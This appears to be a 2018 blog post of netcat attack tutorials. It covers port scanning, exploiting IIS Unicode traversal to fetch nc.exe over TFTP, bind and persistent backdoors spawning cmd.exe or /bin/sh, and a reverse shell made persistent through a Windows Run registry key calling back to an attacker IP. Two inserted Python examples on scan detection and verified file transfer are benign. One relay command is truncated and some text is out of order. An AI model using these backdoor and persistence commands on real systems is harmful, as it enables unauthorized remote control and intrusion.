Monday, May 28, 2018

Netcat tutorials

Port scanning 1 through 200:

nc -v -w2 -z 192.168.0.2 1-200
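What the sweep above looks like from the scanned host's side, as an added example that is not part of the original tutorial: `nc -z` makes one TCP connect per port, so a connection log on the target (or its firewall) shows a single source touching many distinct ports within seconds. The Python below parses a constructed, syslog-style connection log (the format, addresses and thresholds are assumptions for this example; adapt `LINE_RE` to your own firewall or flow logs) and flags any source that reaches at least `min_ports` distinct ports on one destination inside a sliding time window.

```python
"""Spot a port sweep like `nc -z host 1-200` in a connection log.

Added example, not code from the original post. Each port nc probes is a
separate TCP connect, so on the scanned host one source shows up against
many distinct destination ports within a few seconds. The log lines below
are a constructed, syslog-style sample; format, addresses and thresholds
are assumptions for the example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real traffic): 10.0.0.5 sweeps eight ports in
# three seconds, 10.0.0.7 makes two ordinary connections.
SAMPLE_LOG = """\
2018-05-28T10:00:01 CONNECT src=10.0.0.5 dst=192.168.0.2 dport=21
2018-05-28T10:00:01 CONNECT src=10.0.0.5 dst=192.168.0.2 dport=22
2018-05-28T10:00:01 CONNECT src=10.0.0.5 dst=192.168.0.2 dport=23
2018-05-28T10:00:02 CONNECT src=10.0.0.5 dst=192.168.0.2 dport=25
2018-05-28T10:00:02 CONNECT src=10.0.0.5 dst=192.168.0.2 dport=80
2018-05-28T10:00:02 CONNECT src=10.0.0.5 dst=192.168.0.2 dport=110
2018-05-28T10:00:03 CONNECT src=10.0.0.5 dst=192.168.0.2 dport=139
2018-05-28T10:00:03 CONNECT src=10.0.0.5 dst=192.168.0.2 dport=143
2018-05-28T10:00:05 CONNECT src=10.0.0.7 dst=192.168.0.2 dport=80
2018-05-28T10:00:09 CONNECT src=10.0.0.7 dst=192.168.0.2 dport=443
2018-05-28T10:30:00 CONNECT src=10.0.0.5 dst=192.168.0.2 dport=80
"""

# Assumed log layout; change this to match the real source of connection records.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) CONNECT src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)$"
)


def parse_log(text):
    """Yield (timestamp, src, dst, dport) for each line that matches LINE_RE."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dport"])


def find_scanners(text, min_ports=5, window_seconds=10):
    """Return {(src, dst): sorted distinct ports} for every source that reached at
    least min_ports distinct ports on one destination within any window_seconds span."""
    window = timedelta(seconds=window_seconds)
    per_pair = defaultdict(list)
    for ts, src, dst, dport in parse_log(text):
        per_pair[(src, dst)].append((ts, dport))

    hits = {}
    for pair, events in per_pair.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until events[start:end+1] fits in the window.
            while events[end][0] - events[start][0] > window:
                start += 1
            if len({p for _, p in events[start:end + 1]}) >= min_ports:
                hits[pair] = sorted({p for _, p in events})
                break
    return hits


if __name__ == "__main__":
    for (src, dst), ports in find_scanners(SAMPLE_LOG).items():
        print(f"{src} swept {len(ports)} ports on {dst}: {ports}")
```

The sliding window matters because a slow sweep (`-w2` per port, or a larger `-i` delay) spreads the same connects over minutes; lower `min_ports` or widen `window_seconds` to catch that at the cost of more false positives from legitimate multi-service clients.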

-------------------------------

Banner grabbing with nc:

nc -v -n 192.168.0.2 80

------------------------------
IIS Unicode File Traversal:

https://ift.tt/2LBXtt1

Now we want to upload nc.exe to the vulnerable IIS server:

https://ift.tt/2KYD93W


We used:
tftp -I 192.168.1.9 GET nc.exe
which, when carried in the Unicode traversal URL, is transformed into:
http://<exploit URL>/c+TFTP+-i+192.168.1.9+GET+nc.exe

As a TFTP server we can use TFTPD32 by Ph. Jounin.

---------------------------------

Netcat as a backdoor:

Now we have nc.exe on the server and we want to create a backdoor to get a remote shell.

nc -L -p 1001 -d -e cmd.exe

-L -> listen and do not close; keep waiting for new connections after one ends.
-p -> port to listen on.
-d -> detach from the console so the process keeps running in the background.
-e -> program to run once someone connects to the port (cmd.exe).

If we now want to convert this command for Unicode URL use, it will look like this:

http://<exploit URL>/c+nc+-L+-p+1001+-d+-e+cmd.exe

Example:
nc -v 192.168.80.14 80

GET https://ift.tt/2LDZwwv

------------------------------------------------------

Transferring File with nc.exe:

We want to transfer a file called hack.txt to the IIS server and we don't want to use TFTP. We can use nc.exe to transfer the file.

To receive a file named hack.txt on the destination system, start Netcat on the IIS server with the following command:
nc -l -p 1234 > hack.txt

On our source system (the attacking computer) we send a file named hack.txt to the IIS machine with the following command:

nc destination 1234 < hack.txt

#################

Server side: nc -L -p [PORT] -e cmd.exe
Client side: nc -vv [IP] [PORT]

On the victim computer.

reg add hklm\software\microsoft\windows\currentversion\run /v capture /t reg_sz /d "nc 192.168.1.68 10001 -d -e cmd.exe"

Remember 192.168.1.68 is the attacker machine.

And on the attacker machine just listen.

nc -vv -l -p 10001

You should listen on your machine, and when the victim boots up, nc will connect back to you and spawn a reverse shell.

The command prompt popup should come up for a second and disappear.

Oh, you should put nc in the system32 directory so you don't have to specify where nc is located. All you have to do then is type nc from any directory.

-l waits for connection.
-p port to listen on.
-d detach from the process.
-e which program to execute.
-w timeout for connection.
-v verbose [use twice to be more verbose] 

Now we can see that the file has been transferred to the target system, via port 1234.
###############

Netcat fun tricks:

Data Transfer (Pull):
server: nc -l -p [port] < [filename]
client: nc [server ip] [server port] > [filename]

Data Transfer (Push):
server: nc -l -p [port] > [filename]
client: nc [server ip] [server port] < [filename]
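The push transfer just listed, and the hack.txt transfer in the "Transferring File with nc.exe" section above, both work the same way: nc copies bytes between stdin/stdout and the socket with no length, no checksum and no "done" message, so the receiver only learns the transfer is over when the sender closes its side, and a truncated copy looks exactly like a complete one. The Python below is an added example (not code from the original post) that reproduces the push transfer on 127.0.0.1 with plain sockets and adds the check nc lacks, a SHA-256 over both copies. The port is chosen by the OS and the file contents are constructed for the example.

```python
"""Push a file over a raw TCP stream the way `nc -l -p PORT > file` and
`nc host PORT < file` do, then verify it arrived intact.

Added example, not code from the original post. Both ends run on loopback
in one process; the payload stands in for hack.txt.
"""
import hashlib
import socket
import threading


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def receive_file(listener: socket.socket) -> bytes:
    """Receiver side (`nc -l -p PORT > file`): accept one connection, read until EOF."""
    conn, _ = listener.accept()
    chunks = []
    with conn:
        while True:
            chunk = conn.recv(65536)
            if not chunk:          # sender closed its write side: that is the only end marker
                break
            chunks.append(chunk)
    return b"".join(chunks)


def send_file(host: str, port: int, data: bytes) -> None:
    """Sender side (`nc host PORT < file`): stream the bytes, then signal EOF."""
    with socket.create_connection((host, port)) as s:
        s.sendall(data)
        s.shutdown(socket.SHUT_WR)  # equivalent of nc's stdin reaching end of file


def transfer(data: bytes) -> dict:
    """Run both ends on loopback; return the received copy and both digests."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    result = {}
    receiver = threading.Thread(target=lambda: result.update(received=receive_file(listener)))
    receiver.start()
    send_file("127.0.0.1", port, data)
    receiver.join()
    listener.close()

    result["sent_sha256"] = sha256_of(data)
    result["received_sha256"] = sha256_of(result["received"])
    result["intact"] = result["sent_sha256"] == result["received_sha256"]
    return result


if __name__ == "__main__":
    # Constructed stand-in for hack.txt.
    payload = b"hello from the source system\n" * 4000
    r = transfer(payload)
    print(f"received {len(r['received'])} bytes, intact={r['intact']}")
```

With real nc the same check is a hash of the file on each side after the transfer; the explicit `shutdown(SHUT_WR)` is what makes the listener's read loop finish, which is why an nc sender whose stdin never hits EOF leaves the receiver hanging.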

Backdoors:
unix: nc -l -p [port] -e /bin/sh
windows: nc -l -p [port] -e cmd.exe

Persistent Backdoor:
while [ 1 ]; do nc -l -p [port] -e /bin/sh; done

Reverse Shell:
server (attacker): nc -l -p [port]
client (victim): nc [server ip] [server port] -e [shell]

Backdoor Client:
nc [server ip] [port]

Traffic Relay on Linux:
mknod backpipe p
nc -l -p [incoming port] 0backpipe

Traffic Replay:
nc [targetip] [port] < [filename]


reg add hklm\software\microsoft\windows\currentversion\run /v capture /t reg_sz /d "c:\tmp\nc.exe -l -p 6666"

##############
